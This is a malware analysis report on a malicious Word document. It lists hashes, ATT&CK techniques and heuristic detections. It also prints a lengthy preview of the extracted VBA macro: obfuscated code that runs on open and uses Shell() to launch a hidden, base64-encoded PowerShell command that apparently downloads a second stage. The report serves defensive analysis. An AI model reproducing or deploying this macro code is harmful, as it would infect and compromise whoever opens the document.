Office (OLE) malware analysis — malicious · eea6a325249db171

MALICIOUS

Office (OLE)

114.5 KB Created: 2018-05-24 18:24:00 Authoring application: Microsoft Office Word First seen: 2018-06-14

MD5: ca9cd51094f4fc7ad5d1c6a945670ff2 SHA-1: 3248fd6b6e86fac5c2b64aa626a5a5d011120d60 SHA-256: eea6a325249db171d50b72d0c22facda64e101774f92dc75f3cff2590514cfa9

182 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The sample contains a VBA macro with an Autoopen subroutine that calls a function which in turn uses the Shell() function. This function constructs and executes a PowerShell command. The PowerShell command is obfuscated but appears to be designed to download and execute a second-stage payload. The use of Autoopen and Shell() indicates a malicious intent to execute arbitrary code upon opening the document.

Heuristics 6

VBA macros detected medium 3 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
AutoOpen macro high OLE_VBA_AUTOOPEN

AutoOpen macro
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC

OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.

URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 18637 bytes

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	18637 bytes
SHA-256: `5daeec45791edff9fb8e44efea8b7ea78fc7551516a248e2d67867bc69d20f6e`
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "BkkzktwQH" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True Function dUYaVD() On Error Resume Next sJbvl = qRqznZ - Cos(vLzCcS) * 1 - Chr(79431) / 61424 - ChrB(rQVlLp) fOWHdw = 53330 vjVbz = cjbnY - Cos(djEpi) * 1 - Chr(69519) / 17915 - ChrB(LZARB) KjQSNw = 69346 dUYaVD = jTILLaactor + EjLVlPWOJZ + dOFTGjh + HfEJHsKQb + fYBHmAwwPu + NTcRszjrwao + iDQNo + IYFKA + MusZRB + IOKdBJ + LqjJsfMzJ + zWsAjvYWudf GtzOiR = juwnb - Cos(zKjct) * 1 - Chr(75207) / 18029 - ChrB(VjEZQH) SIZZdq = 49737 End Function Sub Autoopen() On Error Resume Next sQBsD = fCdZaL - Cos(kqULa) * 1 - Chr(75804) / 70884 - ChrB(soSJW) lYNzQ = 48905 tXwzXZBuRd (dUYaVD) nLrvGV = jazpwT - Cos(SFNDCp) * 1 - Chr(1935) / 99318 - ChrB(jijQud) cJlZw = 58162 End Sub Function tXwzXZBuRd(lvQzZzF) On Error Resume Next QUSudS = cMCfTT - Cos(uOkwo) * 1 - Chr(69393) / 16157 - ChrB(ZFwCK) jKumo = 55133 ikuXjm = WikaK - Cos(hvBbH) * 1 - Chr(88768) / 38748 - ChrB(uMwaI) wBItf = 82201 cifmcBpJT = Shell(KkXtdJoa + Chr(vbKeyP) + qTXqSWawaj + lvQzZzF, vbHide) LdqaH = BqvUVs - Cos(pkJSit) * 1 - Chr(16391) / 85698 - ChrB(XvzYVK) VrvTM = 42085 End Function Attribute VB_Name = "LAAwSOzsd" Function jTILLaactor() On Error Resume Next KoqjF = dtWvOq - Cos(LkTJf) * 1 - Chr(71452) / 34324 - ChrB(KiBDV) Pulua = 62265 PbqUNJXYkR = "owersHeLL -Win" + "DowsTyle h" + "idden -e S" + "QBOAHYAbw" MrSSi = sqDslI - Cos(kKCKhc) * 1 - Chr(13805) / 8997 - ChrB(GpdjhO) kAoJBz = 86141 BnvBC = "BLAGUALQ" + "BFAFgAcABSA" + "EUAUwBTAGkA" + "TwBuACgAIAAoACg" qAFZU = qPufW - Cos(sbNzZ) * 1 - Chr(16496) / 25084 - ChrB(cpuzdq) rzwok = 34306 RufotokrV = "AIgB7A" + "DgANgB9" + "AHsAN" + "gAzAH0" ThWhj = QZjEKJ - Cos(Jnqks) * 1 - Chr(73678) / 15026 - ChrB(BFIvd) wSwqmn = 82442 wCQXCFkJv = "AewA3ADAAfQB7AD" + "YANwB9AHsAMwAwA" + "H0AewAxADM" + "AfQB7" + "ADQAOAB9AH" + "sANQAzAH0Aew" + "AzADYAfQB7ADUAM" + "AB9AHsAO" + "AAyAH0AewAxADgA" + "fQB7AD" jarYV = DGqmU - Cos(IDGNww) * 1 - Chr(19286) / 55981 - ChrB(bOmGC) HnNYW = 32393 sWbFsq = "kAMgB9AHs" + "AOAAxAH0AewAxA" + "DIANAB9AH" + "sANgB9AHsANwAx" + "AH0AewAyADkAfQ" + "B7ADEAMQAzAH" + "0AewAxADAA" HQtUR = VvPVau - Cos(uMiund) * 1 - Chr(26468) / 79078 - ChrB(MFSTD) TcNwSG = 93875 IzjLjTUmjOV = "OAB9AHsAMQAwA" + "DMAfQB7ADIAfQB" + "7ADMANQ" + "B9AHs" + "AMQAxADgAf" + "QB7ADgAMwB9AHs" + "AMgA2AH0AewAxAH" UchXIX = sLLUW - Cos(ETlsDM) * 1 - Chr(4977) / 8348 - ChrB(BzjZcm) ccawW = 26109 wXYzzT = "0AewAxA" + "DEAMAB" + "9AHsAMQA1ADAAfQ" + "B7ADQANAB9A" + "HsAMQA0A" + "DkAfQ" + "B7ADEAMAA2" + "AH0AewA" + "xADYAMgB" FGFSs = uGwhB - Cos(IcFPt) * 1 - Chr(88905) / 72023 - ChrB(ajniua) ijuYXr = 2575 zXvXMiwfSKk = "9AHsAMQ" + "A2ADMAfQB7ADEA" + "NAA4AH0AewAzAH" + "0AewAyADA" + "AfQB7ADEA" + "MgA3AH0AewAxA" + "DQANAB9AH" jTILLaactor = PbqUNJXYkR + BnvBC + RufotokrV + wCQXCFkJv + sWbFsq + IzjLjTUmjOV + wXYzzT + zXvXMiwfSKk End Function Function EjLVlPWOJZ() On Error Resume Next mzuKlt = zBXNdf - Cos(MhDlj) * 1 - Chr(84302) / 43030 - ChrB(WXRiL) EJdXH = 94031 iUqfhUZE = "sANgAxAH0AewA" + "0ADEAf" + "QB7AD" + "gANQB9AHsANwA" + "1AH0A" + "ewAxADMAMQB" + "9AHsAOAAwAH0Aew" + "AzADMAfQB7" + "ADYAMAB9AHsA" RwjAn = jmKhwE - Cos(WMUmK) * 1 - Chr(18272) / 17480 - ChrB(aXsCh) vsuqV = 66885 wHHiiChPU = "MQAwADQAfQB7AD" + "UANQB9AHsA" + "MQA2ADcA" + "fQB7ADEA" + "NQAxAH0AewAxA" + "DYANgB" + "9AHsAMQA2A" + "DUAfQB" uiUks = mfLqV - Cos(zArpqM) * 1 - Chr(96384) / 76557 - ChrB(raqwFI) uQqaWI = 53868 dMDGUk = "7ADkANQB9AH" + "sAMQAwADEAfQB" + "7ADQAMgB9" + "AHsAOAA3AH0Ae" + "wAxADQAMA" + "B9AHs" + "ANQAyAH0AewAxA" + "DUAfQB7ADEA" + "NAA1AH" + "0AewAxADMAM" zBRzWp = hXYiW - Cos(CDiXu) * 1 - Chr(12311) / 6891 - ChrB(dmnDw) vzuHrY = 25854 Jjwio = "gB9AHsA" + "MQAwA" + "DUAfQB7ADIAMQB9" + "AHsANgAy" + "AH0Ae" + "wAxAD" + "UAOAB9AHsA" puARIc = TZXlkr - Cos(MDbBY) * 1 - Chr(41650) / 43507 - ChrB(itYDT) cRrwqN = ... (truncated)

SHA-256: 5daeec45791edff9fb8e44efea8b7ea78fc7551516a248e2d67867bc69d20f6e

Preview script

First 1,000 lines of the extracted script

Attribute VB_Name = "BkkzktwQH"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function dUYaVD()
On Error Resume Next
sJbvl = qRqznZ - Cos(vLzCcS) * 1 - Chr(79431) / 61424 - ChrB(rQVlLp)
fOWHdw = 53330
vjVbz = cjbnY - Cos(djEpi) * 1 - Chr(69519) / 17915 - ChrB(LZARB)
KjQSNw = 69346
dUYaVD = jTILLaactor + EjLVlPWOJZ + dOFTGjh + HfEJHsKQb + fYBHmAwwPu + NTcRszjrwao + iDQNo + IYFKA + MusZRB + IOKdBJ + LqjJsfMzJ + zWsAjvYWudf
GtzOiR = juwnb - Cos(zKjct) * 1 - Chr(75207) / 18029 - ChrB(VjEZQH)
SIZZdq = 49737
End Function
Sub Autoopen()
On Error Resume Next
sQBsD = fCdZaL - Cos(kqULa) * 1 - Chr(75804) / 70884 - ChrB(soSJW)
lYNzQ = 48905
tXwzXZBuRd (dUYaVD)
nLrvGV = jazpwT - Cos(SFNDCp) * 1 - Chr(1935) / 99318 - ChrB(jijQud)
cJlZw = 58162
End Sub
Function tXwzXZBuRd(lvQzZzF)
On Error Resume Next
QUSudS = cMCfTT - Cos(uOkwo) * 1 - Chr(69393) / 16157 - ChrB(ZFwCK)
jKumo = 55133
ikuXjm = WikaK - Cos(hvBbH) * 1 - Chr(88768) / 38748 - ChrB(uMwaI)
wBItf = 82201
cifmcBpJT = Shell(KkXtdJoa + Chr(vbKeyP) + qTXqSWawaj + lvQzZzF, vbHide)
LdqaH = BqvUVs - Cos(pkJSit) * 1 - Chr(16391) / 85698 - ChrB(XvzYVK)
VrvTM = 42085
End Function


Attribute VB_Name = "LAAwSOzsd"
Function jTILLaactor()
On Error Resume Next
KoqjF = dtWvOq - Cos(LkTJf) * 1 - Chr(71452) / 34324 - ChrB(KiBDV)
Pulua = 62265
PbqUNJXYkR = "owersHeLL -Win" + "DowsTyle h" + "idden -e S" + "QBOAHYAbw"
MrSSi = sqDslI - Cos(kKCKhc) * 1 - Chr(13805) / 8997 - ChrB(GpdjhO)
kAoJBz = 86141
BnvBC = "BLAGUALQ" + "BFAFgAcABSA" + "EUAUwBTAGkA" + "TwBuACgAIAAoACg"
qAFZU = qPufW - Cos(sbNzZ) * 1 - Chr(16496) / 25084 - ChrB(cpuzdq)
rzwok = 34306
RufotokrV = "AIgB7A" + "DgANgB9" + "AHsAN" + "gAzAH0"
ThWhj = QZjEKJ - Cos(Jnqks) * 1 - Chr(73678) / 15026 - ChrB(BFIvd)
wSwqmn = 82442
wCQXCFkJv = "AewA3ADAAfQB7AD" + "YANwB9AHsAMwAwA" + "H0AewAxADM" + "AfQB7" + "ADQAOAB9AH" + "sANQAzAH0Aew" + "AzADYAfQB7ADUAM" + "AB9AHsAO" + "AAyAH0AewAxADgA" + "fQB7AD"
jarYV = DGqmU - Cos(IDGNww) * 1 - Chr(19286) / 55981 - ChrB(bOmGC)
HnNYW = 32393
sWbFsq = "kAMgB9AHs" + "AOAAxAH0AewAxA" + "DIANAB9AH" + "sANgB9AHsANwAx" + "AH0AewAyADkAfQ" + "B7ADEAMQAzAH" + "0AewAxADAA"
HQtUR = VvPVau - Cos(uMiund) * 1 - Chr(26468) / 79078 - ChrB(MFSTD)
TcNwSG = 93875
IzjLjTUmjOV = "OAB9AHsAMQAwA" + "DMAfQB7ADIAfQB" + "7ADMANQ" + "B9AHs" + "AMQAxADgAf" + "QB7ADgAMwB9AHs" + "AMgA2AH0AewAxAH"
UchXIX = sLLUW - Cos(ETlsDM) * 1 - Chr(4977) / 8348 - ChrB(BzjZcm)
ccawW = 26109
wXYzzT = "0AewAxA" + "DEAMAB" + "9AHsAMQA1ADAAfQ" + "B7ADQANAB9A" + "HsAMQA0A" + "DkAfQ" + "B7ADEAMAA2" + "AH0AewA" + "xADYAMgB"
FGFSs = uGwhB - Cos(IcFPt) * 1 - Chr(88905) / 72023 - ChrB(ajniua)
ijuYXr = 2575
zXvXMiwfSKk = "9AHsAMQ" + "A2ADMAfQB7ADEA" + "NAA4AH0AewAzAH" + "0AewAyADA" + "AfQB7ADEA" + "MgA3AH0AewAxA" + "DQANAB9AH"
jTILLaactor = PbqUNJXYkR + BnvBC + RufotokrV + wCQXCFkJv + sWbFsq + IzjLjTUmjOV + wXYzzT + zXvXMiwfSKk
End Function
Function EjLVlPWOJZ()
On Error Resume Next
mzuKlt = zBXNdf - Cos(MhDlj) * 1 - Chr(84302) / 43030 - ChrB(WXRiL)
EJdXH = 94031
iUqfhUZE = "sANgAxAH0AewA" + "0ADEAf" + "QB7AD" + "gANQB9AHsANwA" + "1AH0A" + "ewAxADMAMQB" + "9AHsAOAAwAH0Aew" + "AzADMAfQB7" + "ADYAMAB9AHsA"
RwjAn = jmKhwE - Cos(WMUmK) * 1 - Chr(18272) / 17480 - ChrB(aXsCh)
vsuqV = 66885
wHHiiChPU = "MQAwADQAfQB7AD" + "UANQB9AHsA" + "MQA2ADcA" + "fQB7ADEA" + "NQAxAH0AewAxA" + "DYANgB" + "9AHsAMQA2A" + "DUAfQB"
uiUks = mfLqV - Cos(zArpqM) * 1 - Chr(96384) / 76557 - ChrB(raqwFI)
uQqaWI = 53868
dMDGUk = "7ADkANQB9AH" + "sAMQAwADEAfQB" + "7ADQAMgB9" + "AHsAOAA3AH0Ae" + "wAxADQAMA" + "B9AHs" + "ANQAyAH0AewAxA" + "DUAfQB7ADEA" + "NAA1AH" + "0AewAxADMAM"
zBRzWp = hXYiW - Cos(CDiXu) * 1 - Chr(12311) / 6891 - ChrB(dmnDw)
vzuHrY = 25854
Jjwio = "gB9AHsA" + "MQAwA" + "DUAfQB7ADIAMQB9" + "AHsANgAy" + "AH0Ae" + "wAxAD" + "UAOAB9AHsA"
puARIc = TZXlkr - Cos(MDbBY) * 1 - Chr(41650) / 43507 - ChrB(itYDT)
cRrwqN = 
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.